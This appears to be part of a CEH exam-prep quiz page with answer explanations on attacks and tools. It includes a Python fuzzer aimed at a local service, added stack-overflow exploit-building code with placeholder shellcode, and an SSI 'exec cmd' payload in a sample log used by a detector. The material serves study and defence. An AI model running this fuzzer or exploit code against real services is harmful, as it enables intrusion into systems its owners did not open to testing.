Experienced employees of the EC-Council monitor the market of security providers every day in search of the best solutions for your business. According to EC-Council experts, which vulnerability scanner combines comprehensive static and dynamic security checks to detect vulnerabilities such as XSS, File Inclusion, SQL injection, command execution, and more?
Correct
https://www.syhunt.com/en/?n=Products.SyhuntHybrid Syhunt Hybrid combines comprehensive static and dynamic security scans to detect vulnerabilities like XSS, File Inclusion, SQL Injection, Command Execution and many more, including inferential, in-band and out-of-band attacks, through Hybrid-Augmented Analysis (HAST). With Syhunt's gray-box/hybrid scanning capability, the information acquired during source code scans is automatically used to create and enhance dynamic scans, so all entry points are covered, generating detailed information about the security level of your web applications. Available for on-premises deployment on Windows and Linux 64-bit.
Incorrect answers:
AT&T USM Anywhere https://cybersecurity.att.com/products/usm-anywhere USM Anywhere centralizes security monitoring of networks and devices in the cloud, on-premises, and in remote locations, helping you to detect threats virtually anywhere.
Saleae Logic Analyzer https://www.saleae.com/ A logic analyzer that lets you record and display signals in a circuit so you can debug it quickly. From Arduino projects to spacecraft control systems, over 20,000 professionals and enthusiasts use Logic each month to debug and understand their electrical designs.
Cisco ASA https://en.wikipedia.org/wiki/Cisco_ASA Cisco ASA (Adaptive Security Appliance) is a series of hardware firewalls developed by Cisco Systems.
NOTE: I know, I know. How will this "knowledge" help me in my work? It won't. This knowledge is required only for the exam.
Question 14 of 65
14. Question
Which of the following frameworks contains a set of the most popular tools that facilitate your tasks of collecting information and data from open sources?
Correct
https://osintframework.com/ The OSINT Framework is used mainly by security researchers and penetration testers for digital footprinting, OSINT research, intelligence gathering, and reconnaissance. It provides a simple web-based interface that lets you browse different OSINT tools filtered by category. It also provides a useful classification of intel sources, which makes it a good way to see which areas you have neglected to explore or what the next suggested OSINT step for your investigation could be.
Incorrect answers:
WebSploit Framework https://sourceforge.net/projects/websploit/ An open-source project used to scan and analyze a remote system in order to find various types of vulnerabilities; it supports checks for multiple vulnerability classes.
BeEF https://beefproject.com/ Short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
Speed Phish Framework https://github.com/tatanus/SPF SPF (SpeedPhish Framework) is a Python tool designed to allow quick reconnaissance and deployment of simple social engineering phishing exercises.
Question 15 of 65
15. Question
Identify what the following code is used for:

    #!/usr/bin/env python3
    import socket

    # Build the payload list: "A", then 50, 100, 150, ... "A" characters (101 entries)
    buffer = ["A"]
    counter = 50
    while len(buffer) <= 100:
        buffer.append("A" * counter)
        counter = counter + 50

    # Commands accepted by the target service; each one is tried with every payload
    commands = ["HELP", "STATS.", "RTIME.", "LTIME.", "SRUN.", "TRUN.", "GMON.", "GDOG.", "KSTET.", "GTER.", "HTER.", "LTER.", "KSTAN."]

    for command in commands:
        for buffstring in buffer:
            print("Exploiting " + command + ":" + str(len(buffstring)))
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect(("127.0.0.1", 9999))
            s.recv(50)  # read the service banner before sending
            s.send((command + buffstring).encode())
            s.close()
Correct
https://en.wikipedia.org/wiki/Buffer_overflow The script builds a list of strings of "A" characters of increasing length (50, 100, 150, ... bytes) and sends each one, prefixed with a command, to the service listening on port 9999. It is a simple fuzzer: the length at which the service stops responding or crashes tells the attacker roughly how large the vulnerable buffer is, which is the first step in exploiting a buffer overflow. A buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory locations. Buffers are areas of memory set aside to hold data, often while moving it from one section of a program to another, or between programs. Buffer overflows can often be triggered by malformed inputs; if one assumes all inputs will be smaller than a certain size and the buffer is created to be that size, then an anomalous transaction that produces more data could cause it to write past the end of the buffer. If this overwrites adjacent data or executable code, it may result in erratic program behavior, including memory access errors, incorrect results, and crashes. Exploiting the behavior of a buffer overflow is a well-known security exploit. On many systems, the memory layout of a program, or the system as a whole, is well defined. By sending in data designed to cause a buffer overflow, it is possible to write into areas known to hold executable code and replace it with malicious code, or to selectively overwrite data pertaining to the program's state, therefore causing behavior that was not intended by the original programmer. Buffers are widespread in operating system (OS) code, so it is possible to make attacks that perform privilege escalation and gain unlimited access to the computer's resources. The famed Morris worm in 1988 used this as one of its attack techniques.
Incorrect answers:
Heap spraying https://en.wikipedia.org/wiki/Heap_spraying Heap spraying is a technique used in exploits to facilitate arbitrary code execution. The part of the source code of an exploit that implements this technique is called a heap spray. In general, code that sprays the heap attempts to put a certain sequence of bytes at a predetermined location in the memory of a target process by having it allocate (large) blocks on the process's heap and fill the bytes in these blocks with the right values.
Buffer over-read https://en.wikipedia.org/wiki/Buffer_over-read A buffer over-read is an anomaly where a program, while reading data from a buffer, overruns the buffer's boundary and reads (or tries to read) adjacent memory. This is a special case of violation of memory safety. Buffer over-reads can be triggered, as in the Heartbleed bug, by maliciously crafted inputs that are designed to exploit a lack of bounds checking to read parts of memory not intended to be accessible. They may also be caused by programming errors alone. Buffer over-reads can result in erratic program behavior, including memory access errors, incorrect results, a crash, or a breach of system security. Thus, they are the basis of many software vulnerabilities and can be maliciously exploited to access privileged information.
Brute-force https://en.wikipedia.org/wiki/Brute-force_attack A brute-force attack consists of an attacker submitting many passwords or passphrases with the hope of eventually guessing correctly. The attacker systematically checks all possible passwords and passphrases until the correct one is found. Alternatively, the attacker can attempt to guess the key, which is typically created from the password using a key derivation function. This is known as an exhaustive key search.
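As an added illustration (not part of the original question or answer), the steps that follow once a fuzzer like the one in the question has found a crash length: send a non-repeating cyclic pattern instead of plain "A"s, read the register value the debugger shows at the crash, recover the exact offset of the saved return address from it, and lay out the exploit buffer. The pattern scheme is the one used by Metasploit's pattern_create.rb; the crash length, the register value 0x386F4337, the return address 0xDEADBEEF and the int3 bytes standing in for shellcode are all placeholders for the demonstration, not values from any real target.

```python
import itertools
import string
import struct


def cyclic_pattern(length: int) -> bytes:
    """Non-repeating 'Aa0Aa1Aa2...' pattern in the scheme of Metasploit's
    pattern_create.rb. Any 4-byte window occurs only once within a full
    20280-byte cycle, so the bytes that land in a register identify their offset."""
    out = bytearray()
    for upper, lower, digit in itertools.product(string.ascii_uppercase,
                                                 string.ascii_lowercase,
                                                 string.digits):
        out += (upper + lower + digit).encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(pattern: bytes, register_value: int) -> int:
    """Offset in the pattern of the 4 bytes now sitting in the crashed
    register (EIP, or the low dword of RIP), or -1 if not found.
    x86 is little-endian, so the register value is reversed in memory."""
    needle = struct.pack("<I", register_value & 0xFFFFFFFF)
    return pattern.find(needle)


def fuzz_cases(commands, step=50, count=100):
    """Same growth rule as the script in the question: for every command,
    payloads of step, 2*step, ..., count*step bytes of 'A'."""
    return [(cmd, b"A" * (step * i)) for cmd in commands for i in range(1, count + 1)]


def build_overflow_buffer(offset: int, ret_addr: int, shellcode: bytes,
                          total_len: int, nop_sled: int = 16) -> bytes:
    """Classic stack-overflow layout: junk up to the saved return address,
    the address to jump to (for example a 'jmp esp' gadget), a NOP sled, then
    the payload, padded so the request is the size at which the crash was found."""
    buf = b"A" * offset
    buf += struct.pack("<I", ret_addr)
    buf += b"\x90" * nop_sled
    buf += shellcode
    if len(buf) > total_len:
        raise ValueError("payload does not fit in %d bytes" % total_len)
    return buf + b"C" * (total_len - len(buf))


def demo():
    # 1. assume the fuzzer crashed the service with a 3000-byte payload
    crash_len = 3000
    # 2. a 3000-byte cyclic pattern is sent instead; 0x386F4337 is the EIP value
    #    the debugger would show if the saved return address lies 2003 bytes
    #    into the input (placeholder, computed from the pattern itself)
    pattern = cyclic_pattern(crash_len)
    eip_seen = 0x386F4337
    offset = pattern_offset(pattern, eip_seen)
    # 3. assemble the exploit buffer; address and shellcode are placeholders
    ret_addr = 0xDEADBEEF            # hypothetical 'jmp esp' address
    shellcode = b"\xcc" * 32         # int3 breakpoints stand in for real shellcode
    exploit = build_overflow_buffer(offset, ret_addr, shellcode, crash_len)
    return offset, exploit


if __name__ == "__main__":
    off, buf = demo()
    print("return address overwritten at offset", off, "- exploit buffer is", len(buf), "bytes")
```

In practice the value passed to pattern_offset is copied from the debugger at the moment of the crash; checking that the offset is found (not -1) and that the bytes following the return address are still intact in memory is what tells you whether the buffer layout above will actually be reached.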
Question 16 of 65
16. Question
Lisandro plans to steal confidential information from a company. To do this he uses a phishing attack in which he sends an email to an employee of the company on behalf of one of its senior managers (or even the CEO himself) with instructions to urgently provide the required information. What type of phishing is used in the attack?
Correct
https://www.ncsc.gov.uk/guidance/whaling-how-it-works-and-what-your-organisation-can-do-about-it A whaling attack is a method used by cybercriminals to masquerade as a senior player at an organization and directly target senior or other important individuals at the organization, in order to steal money or sensitive information or to gain access to their computer systems for criminal purposes. It is also known as CEO fraud. These attacks are made all the more believable when the criminals use significant research, drawing on openly available resources such as social media, to craft a bespoke approach tailored to the target individuals. For example https://www.theguardian.com/technology/2016/feb/29/snapchat-leaks-employee-data-ceo-scam-email in 2016 an employee at Snapchat disclosed all of the company's payroll data to a scammer: the employee had received an email that looked to be from the CEO and responded promptly. HR and payroll teams are frequent targets of whaling attacks because they have access to sensitive personal data.
Incorrect answers:
Smishing https://en.wikipedia.org/wiki/Phishing#Spear_phishing Smishing is a form of phishing that uses SMS on mobile phones as the attack platform.
Vishing https://en.wikipedia.org/wiki/Phishing#Voice_phishing Voice phishing, or vishing, is the use of telephony (often Voice over IP telephony) to conduct phishing attacks.
Clone phishing https://en.wikipedia.org/wiki/Phishing#Clone_phishing Clone phishing is a type of phishing attack whereby a legitimate, previously delivered email containing an attachment or link has had its content and recipient address(es) taken and used to create an almost identical, cloned email. The attachment or link within the email is replaced with a malicious version and then sent from an email address spoofed to appear to come from the original sender. It may claim to be a resend of the original or an updated version of it. Typically this requires either the sender or the recipient to have been previously compromised for the malicious third party to obtain the legitimate email.
Question 17 of 65
17. Question
Which of the scenarios corresponds to the behaviour of the attacker from the example below: The attacker created and configured multiple domains pointing to the same host to switch quickly between the domains and avoid detection.
Correct
You will probably find this classification of Adversarial Behavioral Identification only in EC-Council's training materials. Still, you can meet a question on this topic on the exam, so you need to understand it.
Unspecified Proxy Activities: an adversary can create and configure multiple domains pointing to the same host, which allows the adversary to switch quickly between the domains to avoid detection. Security professionals can find such domains by checking the data feeds (DNS and proxy logs) generated by resolving and contacting them: many unrelated domain names resolving to one host is the signal.
Use of Command-Line Interface: on gaining access to the target system, an adversary can use the command-line interface to interact with the target system, browse the files, read file content, modify file content, create new accounts, connect to remote systems, and download and install malicious code.
Data staging: after successfully penetrating a target's network, the adversary uses data staging techniques to collect and combine as much data as possible before exfiltrating it. The types of data collected include sensitive data about employees and customers, financial information, etc.
DNS tunnelling: adversaries use DNS tunnelling to hide malicious traffic inside the legitimate traffic of a protocol that is almost always allowed through the perimeter. Using DNS tunnelling, an adversary can communicate with the command and control server, bypass security controls, and perform data exfiltration, typically by encoding data into long subdomain labels of queries and into the answers (for example TXT records) that come back.
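As an added example (not part of the original answer or of any EC-Council material), the two detection ideas above run over a constructed sample of resolver log lines: group the registrable domains seen resolving to each answer IP to surface the "many domains, one host" pattern, and flag queries whose leftmost label is unusually long or high-entropy, which is what encoded data in a DNS tunnel looks like. The log format, IP addresses, domain names and thresholds are all assumptions for the demonstration; the registrable-domain helper takes the last two labels, which is a simplification of what the Public Suffix List provides.

```python
import math
from collections import defaultdict

# Constructed sample of resolver log lines (not real traffic):
# "<timestamp> <client> <qname> <qtype> <answer>"
SAMPLE_DNS_LOG = """\
2024-05-01T10:00:01 10.0.0.5 update-cdn.example.com A 203.0.113.10
2024-05-01T10:00:07 10.0.0.5 static-assets.example.net A 203.0.113.10
2024-05-01T10:00:13 10.0.0.5 login-portal.example.org A 203.0.113.10
2024-05-01T10:00:20 10.0.0.5 files.example.biz A 203.0.113.10
2024-05-01T10:01:02 10.0.0.9 www.example.com A 198.51.100.7
2024-05-01T10:01:30 10.0.0.12 a3f9c2e1b7d4e6f0a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6.tun.example.xyz TXT 192.0.2.1
2024-05-01T10:01:31 10.0.0.12 9e8d7c6b5a4f3e2d1c0b9a8f7e6d5c4b3a2f1e0d9c8b7a6f.tun.example.xyz TXT 192.0.2.1
2024-05-01T10:02:00 10.0.0.7 mail.example.com MX 198.51.100.8
"""


def parse_dns_log(text):
    """Turn the whitespace-separated log into dicts; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, client, qname, qtype, answer = parts
        records.append({"ts": ts, "client": client,
                        "qname": qname.lower().rstrip("."),
                        "qtype": qtype, "answer": answer})
    return records


def registrable_domain(qname):
    """Last two labels of the name. A real deployment should use the Public
    Suffix List so that names like example.co.uk are handled; simplified here."""
    labels = qname.split(".")
    return ".".join(labels[-2:])


def find_shared_hosts(records, min_domains=3):
    """'Unspecified proxy activities': several unrelated registrable domains all
    resolving to the same IP. Returns {ip: sorted domains} for every IP with at
    least min_domains distinct domains behind it (A records only)."""
    domains_by_ip = defaultdict(set)
    for r in records:
        if r["qtype"] == "A":
            domains_by_ip[r["answer"]].add(registrable_domain(r["qname"]))
    return {ip: sorted(doms) for ip, doms in domains_by_ip.items()
            if len(doms) >= min_domains}


def shannon_entropy(s):
    """Bits per character; hex or base32 blobs score much higher than words."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def flag_tunnel_candidates(records, max_label_len=40, min_entropy=3.5):
    """DNS tunnelling heuristic: the leftmost label is either longer than any
    human-chosen hostname or is long and high-entropy (encoded data).
    Returns the query names that match."""
    flagged = []
    for r in records:
        label = r["qname"].split(".")[0]
        long_label = len(label) > max_label_len
        encoded = len(label) > 20 and shannon_entropy(label) > min_entropy
        if long_label or encoded:
            flagged.append(r["qname"])
    return flagged


if __name__ == "__main__":
    recs = parse_dns_log(SAMPLE_DNS_LOG)
    for ip, doms in find_shared_hosts(recs).items():
        print("host %s fronted by %d domains: %s" % (ip, len(doms), ", ".join(doms)))
    for q in flag_tunnel_candidates(recs):
        print("possible DNS tunnel:", q)
```

Both checks produce leads, not verdicts: CDNs and shared hosting also put many domains on one IP, and some legitimate services (anti-spam lookups, certificate transparency) use long labels, so the analyst should allow-list known infrastructure and then look at query volume per client and the answer record types before escalating.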
Question 18 of 65
18. Question
Identify the type of SQLi from the description: this type of SQLi doesn't show any error message. It can be harder to use because it only reveals information when the application is given SQL payloads that elicit a true or false response from the server. Using this method, an attacker can extract confidential information by observing the responses.
Correct
https://en.wikipedia.org/wiki/SQL_injection
Blind SQL injection is used when a web application is vulnerable to SQL injection but the results of the injection are not visible to the attacker. The vulnerable page may not be one that displays data, but it will display differently depending on the result of a logical statement injected into the legitimate SQL statement called for that page. This type of attack has traditionally been considered time-intensive because a new statement has to be crafted for each bit recovered, and depending on its structure the attack may consist of many unsuccessful requests. Recent advancements allow each request to recover multiple bits with no unsuccessful requests, allowing more consistent and efficient extraction.
Incorrect answers:
Union-based SQLi: Union-based SQLi is an in-band SQL injection technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result, which is then returned as part of the HTTP response.
Out-of-band SQLi: Out-of-band SQL injection is not very common, mostly because it depends on features being enabled on the database server used by the web application. It occurs when an attacker is unable to use the same channel to launch the attack and gather results. Out-of-band techniques offer an attacker an alternative to inferential time-based techniques, especially if the server responses are not very stable (which makes an inferential time-based attack unreliable). Out-of-band SQLi techniques rely on the database server's ability to make DNS or HTTP requests to deliver data to an attacker. Such is the case with Microsoft SQL Server's xp_dirtree command, which can be used to make DNS requests to a server an attacker controls, and with Oracle Database's UTL_HTTP package, which can be used to send HTTP requests from SQL and PL/SQL to a server an attacker controls.
Error-based SQLi: Error-based SQL injections are exploited by triggering errors in the database when invalid inputs are passed to it. The error messages can be used to return the full query results or to gain information on how to restructure the query for further exploitation.
Question 19 of 65
19. Question
You are investigating to determine how the computers of your company's employees were compromised. You find out that the machines were infected through sites that employees often visit: when an employee opens such a site, a web page redirects the browser and malware is downloaded to the machine. Which of the following attacks did the attacker perform against your company's employees?
Correct
https://en.wikipedia.org/wiki/Watering_hole_attack
The watering hole is a computer attack strategy in which an attacker guesses or observes which websites an organization often uses and infects one or more of them with malware. Eventually, some members of the targeted group will become infected. Attacks looking for specific information may only target users coming from a specific IP address, which also makes them harder to detect and research. The name is derived from predators in the natural world, who wait for an opportunity to attack their prey near watering holes.
Incorrect answers:
DNS rebinding https://en.wikipedia.org/wiki/DNS_rebinding DNS rebinding is a method of manipulating the resolution of domain names that is commonly used as a form of computer attack. In this attack, a malicious web page causes visitors to run a client-side script that attacks machines elsewhere on the network. In theory, the same-origin policy prevents this from happening: client-side scripts are only allowed to access content on the same host that served the script. Comparing domain names is an essential part of enforcing this policy, so DNS rebinding circumvents this protection by abusing the Domain Name System (DNS). This attack can be used to breach a private network by causing the victim's web browser to access computers at private IP addresses and return the results to the attacker. It can also be employed to use the victim machine for spamming, distributed denial-of-service attacks, or other malicious activities.
MarioNet https://hub.packtpub.com/marionet-a-browser-based-attack-that-allows-hackers-to-run-malicious-code-even-if-users-exit-a-web-page/ MarioNet allows attackers to place malicious code on high-traffic websites for a short period of time. This allows the attackers to gain a huge user base, remove the malicious code, but continue to control the infected browsers from another central server. MarioNet allows attackers to assemble giant botnets from users' browsers. The researchers state that these bots can be used for in-browser crypto-mining (cryptojacking), DDoS attacks, malicious file hosting/sharing, distributed password cracking, creating proxy networks, advertising click-fraud, and traffic stats boosting.
Clickjacking https://en.wikipedia.org/wiki/Clickjacking Clickjacking is a malicious technique of tricking a user into clicking on something different from what the user perceives, thus potentially revealing confidential information or allowing others to take control of their computer while they click on seemingly innocuous objects, including web pages. Clickjacking is an instance of the confused deputy problem, wherein a computer is tricked into misusing its authority.
Question 20 of 65
20. Question
Which of the following is a Metasploit post-exploitation module that is used to escalate privileges on systems?
Correct
https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
Metasploit has a Meterpreter command, getsystem, that tries a number of different techniques to gain SYSTEM-level privileges on the remote system. There are also various other (local) exploit modules that can be used to escalate privileges. At the link above, you can see an example of using getsystem to escalate privileges.
Question 21 of 65
21. Question
Which of the following is a type of malware that spreads from one system to another, or from one network to another, and causes similar types of damage to the infected system as viruses do?
Correct
https://en.wikipedia.org/wiki/Computer_worm
A computer worm is a standalone malware program that replicates itself in order to spread to other computers. It often uses a computer network to spread itself, relying on security failures on the target computer to access it. It then uses that machine as a host to scan and infect other computers. When these newly infected computers are under control, the worm continues to scan and infect other computers using them as hosts, and this behaviour continues. Computer worms use recursive methods to copy themselves without host programs and distribute themselves following exponential growth, thus controlling and infecting more and more computers in a short time. Worms almost always cause at least some harm to the network, even if only by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer.
Incorrect answers:
Rootkit https://en.wikipedia.org/wiki/Rootkit A rootkit is a collection of computer software, typically malicious, designed to enable access to a computer or an area of its software that is not otherwise allowed (for example, to an unauthorized user), and it often masks its own existence or the existence of other software. The term rootkit is a compound of "root" (the traditional name of the privileged account on Unix-like operating systems) and the word "kit" (which refers to the software components that implement the tool). The term "rootkit" has negative connotations through its association with malware. Rootkit installation can be automated, or an attacker can install it after having obtained root or Administrator access. Obtaining this access is the result of a direct attack on a system, i.e. exploiting a known vulnerability (such as privilege escalation) or a password (obtained by cracking or by social engineering tactics like phishing). Once installed, it becomes possible to hide the intrusion as well as to maintain privileged access. Full control over a system means that existing software can be modified, including software that might otherwise be used to detect or circumvent it.
Adware https://en.wikipedia.org/wiki/Adware Adware, often called advertising-supported software by its developers, is software that generates revenue for its developer by automatically generating online advertisements in the user interface of the software or on a screen presented to the user during the installation process. The software may generate two types of revenue: one for the display of the advertisement and another on a "pay-per-click" basis, if the user clicks on the advertisement. Some advertisements also act as spyware, collecting and reporting data about the user to be sold or used for targeted advertising or user profiling. The software may implement advertisements in a variety of ways, including a static box display, a banner display, full screen, a video, a pop-up ad, or some other form. All forms of advertising carry health, ethical, privacy and security risks for users.
Trojan https://en.wikipedia.org/wiki/Trojan_horse_(computing) A Trojan horse (or simply trojan) is any malware that misleads users about its true intent. The term is derived from the Ancient Greek story of the deceptive Trojan Horse that led to the fall of the city of Troy. Trojans are generally spread by some form of social engineering, for example where a user is duped into executing an email attachment disguised to appear unsuspicious (e.g., a routine form to be filled in), or by clicking on a fake advertisement on social media or elsewhere. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller which can then gain unauthorized access to the affected computer. Ransomware attacks are often carried out using a trojan.
Question 22 of 65
22. Question
The cyber kill chain is essentially a cybersecurity model created by Lockheed Martin that traces the stages of a cyber-attack, identifies vulnerabilities, and helps security teams to stop the attacks at every stage of the chain. At what stage does the intruder transmit the malware via a phishing email or another medium?
Correct
https://en.wikipedia.org/wiki/Kill_chain The cyber kill chain consists of 7 distinct steps:
1. Reconnaissance. The attacker collects data about the target and the tactics for the attack. This includes harvesting email addresses and gathering other information.
2. Weaponization. Attackers develop malware by leveraging security vulnerabilities. Attackers engineer malware based on their needs and the intention of the attack. This process also involves attackers trying to reduce the chances of being detected by the security solutions the organization has in place.
3. Delivery. The attacker delivers the weaponized malware via a phishing email or some other medium. The most common delivery vectors for weaponized payloads include websites, removable disks, and emails. This is the most important stage at which the attack can be stopped by the security teams.
4. Exploitation. The malicious code is delivered into the organization's system. The perimeter is breached here, and the attackers get the opportunity to exploit the organization's systems by installing tools, running scripts, and modifying security certificates.
5. Installation. A backdoor or remote access trojan is installed by the malware and provides access to the intruder. This is another important stage at which the attack can be stopped using systems such as HIPS (Host-based Intrusion Prevention System).
6. Command and Control. The attacker gains control over the organization's systems and network. Attackers gain access to privileged accounts, attempt brute force attacks, search for credentials, and change permissions to take over control.
7. Actions on Objective. The attacker finally extracts the data from the system. The objective involves gathering, encrypting, and extracting confidential information from the organization's environment.
Question 23 of 65
23. Question
Enabling SSI directives allows developers to add dynamic code snippets to static HTML pages without using full-fledged client or server languages. However, suppose the server is incorrectly configured (for example, allowing the exec directive) or the data is not strictly verified. In that case, an attacker can change or enter directives to perform malicious actions. What kind of known attack are we talking about?
Correct
https://owasp.org/www-community/attacks/Server-Side_Includes_(SSI)_Injection SSIs are directives present on Web applications used to feed an HTML page with dynamic content. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes SSI before supplying the page to the user. The Server-Side Includes attack allows the exploitation of a web application by injecting scripts into HTML pages or executing arbitrary code remotely. It can be exploited through manipulation of SSI in use in the application or by forcing its use through user input fields. NOTE: All options are associated with injections. You just need to choose the right technology.
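As an added example (not part of the OWASP text or of the quiz), the following Python shows the two defender-side checks that matter for this attack class: HTML-encoding user input before it is written into a server-parsed page, so that the `<!--#` sequence never reaches the SSI parser intact, and a small detector that flags request parameters carrying SSI directive syntax in a constructed access-log sample. The log format, the `/guestbook.shtml` path and the `name` parameter are assumptions; the directive names are the standard Apache mod_include ones.

```python
import html
import re
from urllib.parse import parse_qs, unquote_plus, urlparse

# SSI directive syntax as the server's include parser sees it: "<!--#" followed by
# a directive name. The names are the standard Apache mod_include directives.
SSI_DIRECTIVE = re.compile(
    r"<!--\s*#\s*(config|echo|exec|fsize|flastmod|include|printenv|set)\b",
    re.IGNORECASE,
)


def contains_ssi_directive(value: str) -> bool:
    """True if a request value carries an SSI directive.

    The value is URL-decoded once more before matching so that a doubly
    encoded parameter (already decoded once by parse_qs) is still caught.
    """
    return SSI_DIRECTIVE.search(unquote_plus(value)) is not None


def render_into_shtml(user_value: str) -> str:
    """The safe way to echo user input into a page that the server post-processes
    for SSI: encode '<', '>', '&' and quotes, so no '<!--#' can survive."""
    return html.escape(user_value, quote=True)


def flag_requests(log_lines):
    """Detection over access-log lines: return the lines whose query string carries
    an SSI directive in any parameter. This is a detector, not a sanitizer."""
    hits = []
    for line in log_lines:
        # Constructed log shape: '<ip> - - [time] "<METHOD> <path?query> HTTP/1.1" <status>'
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        query = urlparse(m.group(1)).query
        for values in parse_qs(query, keep_blank_values=True).values():
            if any(contains_ssi_directive(v) for v in values):
                hits.append(line)
                break
    return hits


# Constructed sample log (hypothetical hosts and paths; RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:10:00:01 +0000] "GET /guestbook.shtml?name=alice HTTP/1.1" 200',
    '203.0.113.7 - - [10/Oct/2023:10:00:02 +0000] "GET /guestbook.shtml?name=%3C%21--%23exec%20cmd%3D%22id%22%20--%3E HTTP/1.1" 200',
    '203.0.113.9 - - [10/Oct/2023:10:00:03 +0000] "GET /guestbook.shtml?name=%3C%21--%23echo+var%3D%22DATE_LOCAL%22+--%3E HTTP/1.1" 200',
    '203.0.113.11 - - [10/Oct/2023:10:00:04 +0000] "GET /about.html HTTP/1.1" 200',
]

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_LOG):
        print("SSI directive in request:", hit)
    print("encoded for output:", render_into_shtml('<!--#echo var="DATE_LOCAL" -->'))
```

On Apache the server-side counterpart is the `Options` directive: `Options IncludesNOEXEC` keeps SSI enabled but disables `exec`, and `Options -Includes` turns SSI off entirely; the output encoding above complements that configuration rather than replacing it.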
Question 24 of 65
24. Question
Passwords are rarely stored in plain text; most often a one-way conversion (hashing) is performed to protect them from unauthorized access. However, there are attacks and tools for cracking such hashes. Look at the following tools and select the one that can NOT be used for this.
Correct
https://en.wikipedia.org/wiki/Password_cracking Most systems don't store passwords themselves. Instead they store hashes of passwords, and when authentication takes place the password is hashed and, if the hashes match, authentication is successful. Different systems store password hashes in different ways depending on the hashing scheme used. Password hash cracking usually consists of taking a wordlist, hashing each word and comparing it against the hash you're trying to crack. This is a variation of a dictionary attack because wordlists often are composed of not just dictionary words but also passwords from public password dumps. This type of cracking becomes difficult when hashes are salted.
https://en.wikipedia.org/wiki/Netcat Netcat is a utility capable of establishing a TCP or UDP connection between two computers, meaning it can write and read through an open port. With the help of the program, files can be transferred and commands can be executed in some instances.
Incorrect answers:
Hashcat https://hashcat.net/ Hackers use Hashcat to automate attacks against passwords and other shared secrets. It gives the user the ability to brute-force credential stores using known hashes, to conduct dictionary attacks and rainbow table attacks, and to reverse engineer readable information on user behavior into hashed-password combination attacks.
John the Ripper https://www.openwall.com/john/ John the Ripper is an offline password cracker. In other words, it tries to find passwords from captured files without having to interact with the target. By doing this, it does not generate suspicious traffic, since the process is generally performed locally, on the attacker's machine. Although it's primarily used to crack password hashes, John can also be used to crack protected archive files, encrypted private keys, and many more.
Ophcrack https://ophcrack.sourceforge.io/ Ophcrack is a password cracker based on rainbow tables, a method that makes it possible to speed up the cracking process by using the results of calculations done in advance and stored in rainbow tables.
Question 25 of 65
25. Question
What is the name of the technique in which attackers move around the territory in a moving vehicle and use special equipment and software to search for vulnerable and accessible WiFi networks?
Correct
https://us-cert.cisa.gov/ncas/tips/ST05-003 Mobile device + wireless network card + antenna + GPS access + special software. This is all that is needed to find most, if not all, of the vulnerable and accessible wireless networks in your area or even city in just a few hours. Does it sound like a plot from a movie? But this is reality. Wardriving occurs when someone uses software and hardware to locate unsecured wireless networks and potentially access them. Software applications are needed to figure out passwords and decrypt networks. Hardware includes a mobile device such as a wireless laptop, a GPS system, and a wireless network card. Wardrivers travel around looking for Wi-Fi signals, plotting the Wi-Fi access points on a map (also called access point mapping) and gathering data on those networks. Wardrivers stay on the move, usually in vehicles, to find those Wi-Fi networks along their route. Variations of wardriving include warbiking, warcycling, warwalking, warjogging, warrailing, wartraining, and warkitting. The legality of wardriving can be confusing. Laws don't expressly prohibit or permit wardriving, but the act may have legal implications under certain jurisdictions and circumstances. For instance, in the United States, it isn't illegal to gather data on wireless networks. Wardriving can have peaceful purposes like data collection and computer-generated mapping. But exploiting wardriving could be problematic if a wardriver accesses a private network. Hacking into networks that aren't yours, especially when accessing another person's data and with malintent, could be considered a network attack and deemed criminal activity. Wardriving can be dangerous on a larger scale when the hack involves corporate networks.
Incorrect answers:
Spectrum analysis https://en.wikipedia.org/wiki/Spectral_density_estimation Spectrum analysis helps you detect various types of interference, including non-Wi-Fi interference and interference that is transient in nature, that decrease the performance of your wireless network. Spectrum analysis enables you to visualize the radio frequencies operating in your area and determine the strength of the detected signals.
Wireless sniffing https://www.cisco.com/c/en/us/support/docs/wireless-mobility/80211/200527-Fundamentals-of-802-11-Wireless-Sniffing.html Wireless sniffing is the practice of eavesdropping on communications within a wireless network by using special software or hardware tools. Sniffing is more intrusive than wireless stumbling, which is looking for the presence of wireless networks. The motives behind wireless sniffing can range from troubleshooting to a malicious attack against a network or individual.
Rogue access point https://en.wikipedia.org/wiki/Rogue_access_point A rogue access point (rogue AP) is any wireless access point that has been installed on a network's wired infrastructure without the consent of the network's administrator or owner, thereby providing unauthorized wireless access to the network's wired infrastructure. Most of the time, rogue APs are set up by employees who want wireless access when none is available.
Question 26 of 65
26. Question
The company hired a cybersecurity specialist to conduct an audit of their mobile application. On the first day of work, the specialist suggested starting by extracting the source code of the mobile application and disassembling it to analyze its design flaws. He is sure that using this technique he can fix bugs in the application, discover underlying vulnerabilities, and improve defence strategies against attacks. Which of the following techniques will the specialist use?
Correct
https://en.wikipedia.org/wiki/Reverse_engineering https://securitytoday.com/articles/2019/02/26/reverse-engineering-is-one-of-your-best-weapons-in-the-fight-against-cyberattacks.aspx Reverse engineering (also known as backwards engineering or back engineering) is a process or method through the application of which one attempts to understand, through deductive reasoning, how a device, process, system, or piece of software accomplishes a task with very little (if any) insight into exactly how it does so. Security experts can apply reverse engineering themselves to understand how hard it is to hack certain software. If it turns out to be a breeze, experts can provide recommendations on ways to complicate matters for a potential hacker. This technique can be especially useful for security software developers who work in a wide range of data formats and protocols, conduct lots of research for client issues, and ensure their code's compatibility with third-party software.
Incorrect answers:
